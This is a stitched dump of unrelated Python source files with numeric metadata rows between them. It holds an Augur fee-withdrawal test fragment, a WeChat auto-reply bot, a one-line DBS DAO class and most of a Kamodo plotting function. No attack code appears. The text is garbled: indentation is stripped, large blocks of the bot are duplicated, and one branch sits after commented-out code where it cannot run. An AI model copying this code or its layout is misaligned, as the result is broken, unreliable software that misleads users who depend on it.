disputeWindow = contractsFixture.applySignature('DisputeWindow', market.getDisputeWindow())
contractsFixture.contracts["Time"].setTimestamp(disputeWindow.getEndTime() + 1)
totalCollectedFees = market.marketCreatorFeesAttoCash() + market.totalPreFinalizationAffiliateFeesAttoCash() + market.validityBondAttoCash()
nextDisputeWindowAddress = universe.getOrCreateNextDisputeWindow(False)
nextDisputeWindowBalanceBeforeFinalization = cash.balanceOf(universe.getOrCreateNextDisputeWindow(False))
assert market.finalize()
if invalid:
with raises(TransactionFailed):
market.withdrawAffiliateFees(contractsFixture.accounts[3])
assert cash.balanceOf(universe.getOrCreateNextDisputeWindow(False)) == nextDisputeWindowBalanceBeforeFinalization + totalCollectedFees
else:
with TokenDelta(cash, expectedAffiliateFees, contractsFixture.accounts[3], "Affiliate did not recieve the correct fees"):
market.withdrawAffiliateFees(contractsFixture.accounts[3])
# No more fees can be withdrawn
if not invalid:
with TokenDelta(cash, 0, contractsFixture.accounts[3], "Affiliate double received fees"):
market.withdrawAffiliateFees(contractsFixture.accounts[3])
| 56.774044
| 189
| 0.728876
| 5,084
| 48,996
| 6.994296
| 0.052714
| 0.083354
| 0.06215
| 0.026435
| 0.907759
| 0.897072
| 0.884699
| 0.878934
| 0.853624
| 0.83765
| 0
| 0.042404
| 0.150482
| 48,996
| 863
| 190
| 56.774044
| 0.811907
| 0.034105
| 0
| 0.755162
| 0
| 0
| 0.048723
| 0
| 0
| 0
| 0
| 0
| 0.449853
| 1
| 0.032448
| false
| 0
| 0.00885
| 0
| 0.041298
| 0.007375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
385067b378b9582a31531740d33449bb64fc711b
| 8,733
|
py
|
Python
|
bot.py
|
jesson20121020/myRobot
|
667213f6b21ac69dddeff453c4ec663e3e082e73
|
[
"Apache-2.0"
] | 2
|
2016-12-25T14:31:47.000Z
|
2016-12-27T02:30:53.000Z
|
bot.py
|
jesson20121020/myRobot
|
667213f6b21ac69dddeff453c4ec663e3e082e73
|
[
"Apache-2.0"
] | null | null | null |
bot.py
|
jesson20121020/myRobot
|
667213f6b21ac69dddeff453c4ec663e3e082e73
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
from wxbot import *
import json
import math
DEFAULT_WX_ROBOT_SWITCH = True
class WXChatbot(WXBot):
def __init__(self):
WXBot.__init__(self)
self.robot_switch = DEFAULT_WX_ROBOT_SWITCH
def auto_switch(self, msg):
msg_data = msg['content']['data']
stop_cmd = [u'退下', u'走开', u'关闭', u'关掉', u'休息', u'滚开']
start_cmd = [u'出来', u'启动', u'工作']
if self.robot_switch:
if msg_data in stop_cmd:
self.robot_switch = False
self.send_msg_by_uid(u'再见,记得想我哦!', msg['to_user_id'])
else:
if msg_data in start_cmd:
self.robot_switch = True
self.send_msg_by_uid(u'我是可爱的小冰轩,我会得可多了!', msg['to_user_id'])
def handle_msg_all(self, msg):
if not self.robot_switch: return
import AutoReplyMgr
# print 'xdc:::::msg:::', self.robot_switch, msg
# if not self.robot_switch and msg['msg_type_id'] != 1:
# return
# print 'xdc:::::::::', msg
if msg['msg_type_id'] == 1 and msg['content']['type'] == 0: # reply to self
self.auto_switch(msg)
elif msg['msg_type_id'] == 4 and msg['content']['type'] == 0: # text message from contact
reply = AutoReplyMgr.instance().auto_reply(msg['user']['id'], msg['content']['data'])
if reply:
self.send_msg_by_uid(reply, msg['user']['id'])
self.send_img_msg_by_uid('img/1.png', msg['user']['id'])
self.send_file_msg_by_uid('bot.py', msg['user']['id'])
elif msg['msg_type_id'] == 4 and msg['content']['type'] == 0: # text message from contact
reply = AutoReplyMgr.instance().auto_reply(msg['user']['id'], msg['content']['data'])
if reply:
self.send_msg_by_uid(reply, msg['user']['id'])
elif msg['msg_type_id'] == 3 and msg['content']['type'] == 0: # group text message
self.auto_switch(msg)
if not self.robot_switch:
return
if 'detail' in msg['content']:
my_names = self.get_group_member_name(self.my_account['UserName'], msg['user']['id'])
if my_names is None:
my_names = {}
if 'NickName' in self.my_account and self.my_account['NickName']:
my_names['nickname2'] = self.my_account['NickName']
if 'RemarkName' in self.my_account and self.my_account['RemarkName']:
my_names['remark_name2'] = self.my_account['RemarkName']
is_at_me = False
for detail in msg['content']['detail']:
if detail['type'] == 'at':
for k in my_names:
if my_names[k] and my_names[k] == detail['value']:
is_at_me = True
break
if is_at_me:
src_name = msg['content']['user']['name']
reply = 'to ' + src_name + ': '
if msg['content']['type'] == 0: # text message
reply += AutoReplyMgr.instance().auto_reply(msg['content']['user']['id'], msg['content']['desc'])
else:
reply += u"对不起,只认字,其他杂七杂八的我都不认识,,,Ծ‸Ծ,,"
self.send_msg_by_uid(reply, msg['user']['id'])
else:
reply = AutoReplyMgr.instance().auto_reply(msg['content']['user']['id'], msg['content']['desc'])
self.send_msg_by_uid(reply, msg['user']['id'])
else:
reply = AutoReplyMgr.instance().auto_reply(msg['content']['user']['id'], msg['content']['desc'])
self.send_msg_by_uid(reply, msg['user']['id'])
# class TulingWXBot(WXBot):
# def __init__(self):
# WXBot.__init__(self)
# self.tuling_key = ""
# self.robot_switch = True
# def auto_switch(self, msg):
# msg_data = msg['content']['data']
# stop_cmd = [u'退下', u'走开', u'关闭', u'关掉', u'休息', u'滚开']
# start_cmd = [u'出来', u'启动', u'工作']
# if self.robot_switch:
# for i in stop_cmd:
# if i == msg_data:
# self.robot_switch = False
# self.send_msg_by_uid(u'[Robot]' + u'bye, remember miss me!', msg['to_user_id'])
# else:
# for i in start_cmd:
# if i == msg_data:
# self.robot_switch = True
# self.send_msg_by_uid(u'[Robot]' + u'I am comming!', msg['to_user_id'])
# def handle_msg_all(self, msg):
# # print 'xdc:::::msg:::', self.robot_switch, msg
# # if not self.robot_switch and msg['msg_type_id'] != 1:
# # return
elif msg['msg_type_id'] == 3 and msg['content']['type'] == 0: # group text message
self.auto_switch(msg)
if not self.robot_switch:
return
if 'detail' in msg['content']:
my_names = self.get_group_member_name(self.my_account['UserName'], msg['user']['id'])
if my_names is None:
my_names = {}
if 'NickName' in self.my_account and self.my_account['NickName']:
my_names['nickname2'] = self.my_account['NickName']
if 'RemarkName' in self.my_account and self.my_account['RemarkName']:
my_names['remark_name2'] = self.my_account['RemarkName']
is_at_me = False
for detail in msg['content']['detail']:
if detail['type'] == 'at':
for k in my_names:
if my_names[k] and my_names[k] == detail['value']:
is_at_me = True
break
if is_at_me:
src_name = msg['content']['user']['name']
reply = 'to ' + src_name + ': '
if msg['content']['type'] == 0: # text message
reply += AutoReplyMgr.instance().auto_reply(msg['content']['user']['id'], msg['content']['desc'])
else:
reply += u"对不起,只认字,其他杂七杂八的我都不认识,,,Ծ‸Ծ,,"
self.send_msg_by_uid(reply, msg['user']['id'])
else:
reply = AutoReplyMgr.instance().auto_reply(msg['content']['user']['id'], msg['content']['desc'])
self.send_msg_by_uid(reply, msg['user']['id'])
else:
reply = AutoReplyMgr.instance().auto_reply(msg['content']['user']['id'], msg['content']['desc'])
self.send_msg_by_uid(reply, msg['user']['id'])
# class TulingWXBot(WXBot):
# def __init__(self):
# WXBot.__init__(self)
# self.tuling_key = ""
# self.robot_switch = True
# def auto_switch(self, msg):
# msg_data = msg['content']['data']
# stop_cmd = [u'退下', u'走开', u'关闭', u'关掉', u'休息', u'滚开']
# start_cmd = [u'出来', u'启动', u'工作']
# if self.robot_switch:
# for i in stop_cmd:
# if i == msg_data:
# self.robot_switch = False
# self.send_msg_by_uid(u'[Robot]' + u'bye, remember miss me!', msg['to_user_id'])
# else:
# for i in start_cmd:
# if i == msg_data:
# self.robot_switch = True
# self.send_msg_by_uid(u'[Robot]' + u'I am comming!', msg['to_user_id'])
# def handle_msg_all(self, msg):
# # print 'xdc:::::msg:::', self.robot_switch, msg
# # if not self.robot_switch and msg['msg_type_id'] != 1:
# # return
# # print 'xdc:::::::::', msg
# if msg['msg_type_id'] == 1 and msg['content']['type'] == 0: # reply to self
# self.auto_switch(msg)
# elif msg['msg_type_id'] == 4 and msg['content']['type'] == 0: # text message from contact
# self.send_msg_by_uid(self.tuling_auto_reply(msg['user']['id'], msg['content']['data']), msg['user']['id'])
# elif msg['msg_type_id'] == 3 and msg['content']['type'] == 0: # group text message
# self.auto_switch(msg)
# if not self.robot_switch:
# return
# if 'detail' in msg['content']:
# my_names = self.get_group_member_name(self.my_account['UserName'], msg['user']['id'])
# if my_names is None:
# my_names = {}
# if 'NickName' in self.my_account and self.my_account['NickName']:
# my_names['nickname2'] = self.my_account['NickName']
# if 'RemarkName' in self.my_account and self.my_account['RemarkName']:
# my_names['remark_name2'] = self.my_account['RemarkName']
# is_at_me = False
# for detail in msg['content']['detail']:
# if detail['type'] == 'at':
# for k in my_names:
# if my_names[k] and my_names[k] == detail['value']:
# is_at_me = True
# break
# if is_at_me:
# src_name = msg['content']['user']['name']
# reply = 'to ' + src_name + ': '
# if msg['content']['type'] == 0: # text message
# reply += self.tuling_auto_reply(msg['content']['user']['id'], msg['content']['desc'])
# else:
# reply += u"对不起,只认字,其他杂七杂八的我都不认识,,,Ծ‸Ծ,,"
# self.send_msg_by_uid(reply, msg['user']['id'])
# else:
# reply = self.tuling_auto_reply(msg['content']['user']['id'], msg['content']['desc'])
# self.send_msg_by_uid(reply, msg['user']['id'])
# else:
# reply = self.tuling_auto_reply(msg['content']['user']['id'], msg['content']['desc'])
# self.send_msg_by_uid(reply, msg['user']['id'])
def main():
bot = WXChatbot()
bot.DEBUG = True
bot.conf['qr'] = 'png'
bot.run()
def rpyc_server():
from rpycserver import remote_call_func
from rpyc.utils.server import ThreadedServer
rpycServer = ThreadedServer(remote_call_func, hostname='localhost', port=11111, auto_register=False)
rpycServer.start()
print 'xdc::::::::::11'
if __name__ == '__main__':
# thread.start_new_thread(main, ())
# thread.start_new_thread(rpyc_server, ())
# rpyc_server()
# main()
import threading
t1 = threading.Thread(target = main, args=())
t2 = threading.Thread(target = rpyc_server, args=())
t1.setDaemon(True)
t1.start()
t2.setDaemon(True)
t2.start()
t2.join()
| 34.113281
| 110
| 0.627047
| 1,328
| 8,733
| 3.89759
| 0.107681
| 0.085008
| 0.063756
| 0.045209
| 0.87558
| 0.853555
| 0.853555
| 0.848532
| 0.834235
| 0.834235
| 0
| 0.006118
| 0.176457
| 8,733
| 255
| 111
| 34.247059
| 0.713154
| 0.417611
| 0
| 0.628099
| 0
| 0
| 0.169682
| 0.011259
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.057851
| null | null | 0.008264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38e268c3f36dfe630df417e05c92b52cd1c8661b
| 220
|
py
|
Python
|
Server/Python/src/dbs/dao/MySQL/PhysicsGroup/GetID.py
|
vkuznet/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 8
|
2015-08-14T04:01:32.000Z
|
2021-06-03T00:56:42.000Z
|
Server/Python/src/dbs/dao/MySQL/PhysicsGroup/GetID.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 162
|
2015-01-07T21:34:47.000Z
|
2021-10-13T09:42:41.000Z
|
Server/Python/src/dbs/dao/MySQL/PhysicsGroup/GetID.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 16
|
2015-01-22T15:27:29.000Z
|
2021-04-28T09:23:28.000Z
|
#!/usr/bin/env python
"""
This module provides PhysicsGroup.GetID data access object.
"""
from dbs.dao.Oracle.PhysicsGroup.GetID import GetID as OraPhysicsGroupGetID
class GetID(OraPhysicsGroupGetID):
pass
| 22
| 75
| 0.754545
| 26
| 220
| 6.384615
| 0.807692
| 0.204819
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154545
| 220
| 9
| 76
| 24.444444
| 0.892473
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
2a0db1f5e718e6f4cc8e4d6d4d8e7ca1aa15c323
| 43,333
|
py
|
Python
|
kamodo_ccmc/readers/reader_kplots.py
|
asher-pembroke/Kamodo-1
|
7dd155d98661f663b3f71267f92208949f279db7
|
[
"NASA-1.3"
] | 6
|
2021-06-21T19:53:17.000Z
|
2021-08-19T14:09:36.000Z
|
kamodo_ccmc/readers/reader_kplots.py
|
asher-pembroke/Kamodo-1
|
7dd155d98661f663b3f71267f92208949f279db7
|
[
"NASA-1.3"
] | null | null | null |
kamodo_ccmc/readers/reader_kplots.py
|
asher-pembroke/Kamodo-1
|
7dd155d98661f663b3f71267f92208949f279db7
|
[
"NASA-1.3"
] | 1
|
2021-09-20T15:59:25.000Z
|
2021-09-20T15:59:25.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 2 15:58:53 2021
@author: rringuet
"""
#import numpy as np
from numpy import meshgrid, float32, float64, ravel, array, reshape
from kamodo import kamodofy, partial, Kamodo
def convert_to_array(value):
'''check for floats and integers. convert to arrays if found.'''
type_check = [isinstance(value, float),isinstance(value, int),
isinstance(value, float32),isinstance(value, float64),
isinstance(value, list)]
if sum(type_check)>0:
return array([value])
else:
return value
def grid4D(kamodo_object, varname, time, c1, c2, c3):
'''return data from interpolated function'''
tt, xx, yy, zz = meshgrid(time, c1, c2, c3, indexing = 'xy')
traj = array([ravel(tt), ravel(xx), ravel(yy), ravel(zz)]).T
return getattr(kamodo_object, varname)(traj)
def grid3D(kamodo_object, varname, time, c1, c2):
'''return data from interpolated function'''
tt, xx, yy = meshgrid(time, c1, c2, indexing = 'xy')
traj = array([ravel(tt), ravel(xx), ravel(yy)]).T
return getattr(kamodo_object, varname)(traj)
def plot2D(kamodo_object, varname, plottype, t, lon, lat, h=-1):
'''Use Kamodo's native plotting to generate 2D plot.
t, lon, lat, and h also double as t, x, y, and z for cartesian inputs.
Possible plot types are LonLat, LatH, LonH, TimeLat, TimeLon, and TimeH for
spherical coordinates; and TimeX, TimeY, TimeX, XY, XZ, and YZ for
cartesian coordinates.
If the variable depends on 4 dimensions, h should be given.
If a LonLat plot is requested, then the function expects a single value
(integer, float, float32, or float64) for t and h (if h is given).
In this case, lon and lat should be 1D arrays or flat lists. Similar
data formatting is required for coordinates not plotted for all plot types.
If the variable depends on height, then a value or array should be given for h.
'''
#initialize new kamodo object
plot_kamodo=Kamodo()
#first, determine if kamodo function is griddified or not, and function units
gridified = (varname[-3:]=='ijk')
units = kamodo_object.variables[varname]['units']
xvec = kamodo_object.variables[varname]['xvec']
#next, determine vertical dependency of variable
coord_list = list(xvec.keys())
if len(coord_list)==4:
vert = coord_list[-1] #height, ilev, ilev1, or milev (always last)
else:
vert='none'
if 'H' in plottype:
raise AttributeError(f'Cannot produce {plottype} plot for a variable '+\
f'that does not depend on height.\n{varname}: {xvec}\n')
#convert inputs to arrays
t = convert_to_array(t)
lon = convert_to_array(lon) #doubles as x
lat = convert_to_array(lat) #doubles as y
h = convert_to_array(h) #doubles as z
#create printing message for heading of plot
#print(varname, plottype, units, gridified, vert)
if t.shape[0]==1: t_message = f'Time slice at {t[0]:.3f} hrs. '
else: t_message=''
if lon.shape[0]==1:
if 'z' in vert: lon_message = f'X slice at {lon[0]:.3f} R_E. '
else: lon_message = f'Longitude slice at {lon[0]:.3f} deg. '
else: lon_message=''
if lat.shape[0]==1:
if 'z' in vert: lat_message = f'Y slice at {lat[0]:.3f} R_E. '
else: lat_message = f'Latitude slice at {lat[0]:.3f} deg. '
else: lat_message=''
if vert=='none':
h_message = ''
elif h.shape[0]>1:
h_message = ''
else:
if vert in ['ilev','ilev1','milev']: h_message = f'Pressure level slice at {h[0]}.'
elif vert=='height': h_message = f'Height slice at {h[0]:.3f} km.'
elif vert=='radius': h_message = f'Radius slice at {h[0]:.7f} R_E.'
elif 'z' in vert: h_message = f'Z slice at {h[0]:.7f} R_E.'
print(t_message+lon_message+lat_message+h_message)
#create 2D kamodo function for plotting desired plottype with given function
if gridified: #logic for plotting with gridified functions
#LonLat plots
if plottype=='LonLat':
arg_units = {coord_list[1]:xvec[coord_list[1]],
coord_list[2]:xvec[coord_list[2]]} #e.g. {'lon':'deg','lat':'deg'}
#accounting for differing vertical dependencies
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,height=h)
def pfunc(time, lon, lat, height):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
if vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,radius=h)
def pfunc(time, lon, lat, radius):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,ilev=h)
def pfunc(time, lon, lat, ilev):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,ilev1=h)
def pfunc(time, lon, lat, ilev1):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,milev=h)
def pfunc(time, mlon, mlat, milev):
return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
plot_kamodo['LonLat'] = pfunc
return plot_kamodo.plot(LonLat=dict(mlat=lat,mlon=lon))
elif vert=='none':
if coord_list[1]=='Elon': #for ctipe 3D variables that depend on Elon and Elat
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t)
def pfunc(time, Elon, Elat):
return getattr(kamodo_object, varname)(time=time,Elon=Elon,Elat=Elat)
plot_kamodo['LonLat'] = pfunc
return plot_kamodo.plot(LonLat=dict(Elat=lat,Elon=lon))
else:
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t)
def pfunc(time, lon, lat):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat)
plot_kamodo['LonLat'] = pfunc
return plot_kamodo.plot(LonLat=dict(lat=lat,lon=lon))
#TimeLon plots
elif plottype=='TimeLon':
arg_units={'time':'hr',coord_list[1]:xvec[coord_list[1]]} #'lon':'deg'
#accounting for differing vertical dependencies
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat,height=h)
def pfunc(time, lon, lat, height):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat,radius=h)
def pfunc(time, lon, lat, radius):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat,ilev=h)
def pfunc(time, lon, lat, ilev):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat,ilev1=h)
def pfunc(time, lon, lat, ilev1):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(mlat=lat,milev=h)
def pfunc(time, mlon, mlat, milev):
return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
plot_kamodo['TimeLon'] = pfunc
return plot_kamodo.plot(TimeLon=dict(time=t,mlon=lon))
elif vert=='none':
if coord_list[1]=='Elon': #for ctipe 3D variables that depend on Elon and Elat
@kamodofy(units=units, arg_units=arg_units)
@partial(Elat=lat)
def pfunc(time, Elon, Elat):
return getattr(kamodo_object, varname)(time=time,Elon=Elon,Elat=Elat)
plot_kamodo['TimeLon'] = pfunc
return plot_kamodo.plot(TimeLon=dict(time=t,Elon=lon))
else:
@kamodofy(units=units, arg_units=arg_units)
@partial(lat=lat)
def pfunc(time, lon, lat):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat)
plot_kamodo['TimeLon'] = pfunc
return plot_kamodo.plot(TimeLon=dict(time=t,lon=lon))
#TimeLat plots
elif plottype=='TimeLat':
arg_units={'time':'hr',coord_list[2]:xvec[coord_list[2]]} #'lat':'deg'
#accounting for differing vertical dependencies
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,height=h)
def pfunc(time, lon, lat, height):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,radius=h)
def pfunc(time, lon, lat, radius):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,ilev=h)
def pfunc(time, lon, lat, ilev):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,ilev1=h)
def pfunc(time, lon, lat, ilev1):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(mlon=lon,milev=h)
def pfunc(time, mlon, mlat, milev):
return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
plot_kamodo['TimeLat'] = pfunc
return plot_kamodo.plot(TimeLat=dict(time=t,mlat=lat))
elif vert=='none':
if coord_list[1]=='Elon': #for ctipe 3D variables that depend on Elon and Elat
@kamodofy(units=units, arg_units=arg_units)
@partial(Elon=lon)
def pfunc(time, Elon, Elat):
return getattr(kamodo_object, varname)(time=time,Elon=Elon,Elat=Elat)
plot_kamodo['TimeLat'] = pfunc
return plot_kamodo.plot(TimeLat=dict(time=t,Elat=lat))
else:
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon)
def pfunc(time, lon, lat):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat)
plot_kamodo['TimeLat'] = pfunc
return plot_kamodo.plot(TimeLat=dict(time=t,lat=lat))
#TimeH plots
elif plottype=='TimeH':
#accounting for differing vertical dependencies
arg_units = {'time':'hr',coord_list[-1]:xvec[coord_list[-1]]} #'time':'hr', 'height':'km'
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,lat=lat)
def pfunc(time, lon, lat, height):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,height=h))
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,lat=lat)
def pfunc(time, lon, lat, radius):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,radius=h))
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,lat=lat)
def pfunc(time, lon, lat, ilev):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,ilev=h))
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(lon=lon,lat=lat)
def pfunc(time, lon, lat, ilev1):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,ilev1=h))
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(mlon=lon,mlat=lat)
def pfunc(time, mlon, mlat, milev):
return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
plot_kamodo['TimeH'] = pfunc
return plot_kamodo.plot(TimeH=dict(time=t,milev=h))
elif vert=='none':
raise AttributeError('Variable does not depend on height.')
#LonH plots
elif plottype=='LonH':
#accounting for differing vertical dependencies
arg_units = {coord_list[1]:xvec[coord_list[1]],
coord_list[-1]:xvec[coord_list[-1]]} #'lon':'deg', 'height':'km'
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lat=lat)
def pfunc(time, lon, lat, height):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(lon=lon,height=h))
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lat=lat)
def pfunc(time, lon, lat, radius):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(lon=lon,radius=h))
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lat=lat)
def pfunc(time, lon, lat, ilev):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(lon=lon,ilev=h))
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lat=lat)
def pfunc(time, lon, lat, ilev1):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(lon=lon,ilev1=h))
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,mlat=lat)
def pfunc(time, mlon, mlat, milev):
return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
plot_kamodo['LonH'] = pfunc
return plot_kamodo.plot(LonH=dict(mlon=lon,milev=h))
elif vert=='none':
raise AttributeError('Variable does not depend on height.')
#LatH plots
elif plottype=='LatH':
#accounting for differing vertical dependencies
arg_units = {coord_list[2]:xvec[coord_list[2]],
coord_list[-1]:xvec[coord_list[-1]]} #'lat':'deg', 'height':'km'
if vert=='height':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lon=lon)
def pfunc(time, lon, lat, height):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,height=height)
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(lat=lat,height=h))
elif vert=='radius':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lon=lon)
def pfunc(time, lon, lat, radius):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,radius=radius)
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(lat=lat,radius=h))
elif vert=='ilev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lon=lon)
def pfunc(time, lon, lat, ilev):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev=ilev)
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(lat=lat,ilev=h))
elif vert=='ilev1':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,lon=lon)
def pfunc(time, lon, lat, ilev1):
return getattr(kamodo_object, varname)(time=time,lon=lon,lat=lat,ilev1=ilev1)
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(lat=lat,ilev1=h))
elif vert=='milev':
@kamodofy(units=units, arg_units=arg_units)
@partial(time=t,mlon=lon)
def pfunc(time, mlon, mlat, milev):
return getattr(kamodo_object, varname)(time=time,mlon=mlon,mlat=mlat,milev=milev)
plot_kamodo['LatH'] = pfunc
return plot_kamodo.plot(LatH=dict(mlat=lat,milev=h))
elif vert=='none':
raise AttributeError('Variable does not depend on height.')
#cartesian plots
elif plottype=='TimeX':
arg_units={'time':'hr',coord_list[1]:xvec[coord_list[1]]} #'X':'R_E'
@kamodofy(units=units, arg_units=arg_units)
@partial(y=lat,z=h)
def pfunc(time, x, y, z):
return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
plot_kamodo['TimeX'] = pfunc
return plot_kamodo.plot(TimeX=dict(time=t,x=lon))
elif plottype=='TimeY':
arg_units={'time':'hr',coord_list[2]:xvec[coord_list[2]]} #'X':'R_E'
@kamodofy(units=units, arg_units=arg_units)
@partial(x=lon,z=h)
def pfunc(time, x, y, z):
return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
plot_kamodo['TimeY'] = pfunc
return plot_kamodo.plot(TimeY=dict(time=t,y=lat))
elif plottype=='TimeZ':
arg_units={'time':'hr',coord_list[3]:xvec[coord_list[3]]} #'X':'R_E'
@kamodofy(units=units, arg_units=arg_units)
@partial(x=lon,y=lat)
def pfunc(time, x, y, z):
return getattr(kamodo_object, varname)(time=time,x=x,y=y,z=z)
plot_kamodo['TimeZ'] = pfunc
return plot_kamodo.plot(TimeZ=dict(time=t,z=h))
elif plottype=='XY':
arg_units = {coord_list[1]:xvec[coord_list[1]],
coord_list[2]:xvec[coord_list[2]]} #e.g. {'x':'R_E','y':'R_E'}
